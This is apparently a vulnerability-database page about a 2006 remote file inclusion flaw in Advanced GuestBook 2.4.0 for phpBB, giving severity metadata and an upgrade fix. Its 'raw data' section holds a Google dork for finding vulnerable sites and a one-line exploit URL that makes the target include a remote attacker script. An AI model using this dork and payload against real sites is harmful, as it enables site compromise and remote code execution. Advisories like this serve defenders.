header-logo
Suggest Exploit
vendor:
Advanced GuestBook
by:
[Oo]
7,5
CVSS
HIGH
Remote File Inclusion
94
CWE
Product Name: Advanced GuestBook
Affected Version From: 2.4.0
Affected Version To: 2.4.0
Patch Exists: YES
Related CWE: CVE-2006-1790
CPE: a:phpbb:advanced_guestbook:2.4.0
Metasploit: https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2006-0329/https://www.rapid7.com/db/vulnerabilities/linuxrpm-CESA-2006-0328/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2006-1790/https://www.rapid7.com/db/vulnerabilities/linuxrpm-CESA-2006-0329/https://www.rapid7.com/db/vulnerabilities/linuxrpm-CESA-2006-0330/https://www.rapid7.com/db/vulnerabilities/suse-cve-2006-1790/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2006-0330/https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2006-0328/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2006

Advanced GuestBook for phpBB <= 2.4.0 Remote File Inclusion

Advanced GuestBook for phpBB version 2.4.0 and prior is vulnerable to a remote file inclusion vulnerability. This vulnerability allows an attacker to include a remote file, usually containing malicious code, on the vulnerable website. The vulnerable code is located in the addentry.php file.

Mitigation:

Upgrade to version 2.4.1 or later.
Source

Exploit-DB raw data:

Title: Advanced GuestBook for phpBB <= 2.4.0 Remote File Inclusion
Dork: inurl:guestbook.php "Advanced GuestBook" "powered by phpbb"
Credits: [Oo]

Exploit: http://[url]/[phpbb_path]/admin/addentry.php?phpbb_root_path=http://[badscript]?

# milw0rm.com [2006-04-28]

Navigation

Suggest Exploit

Services By CQR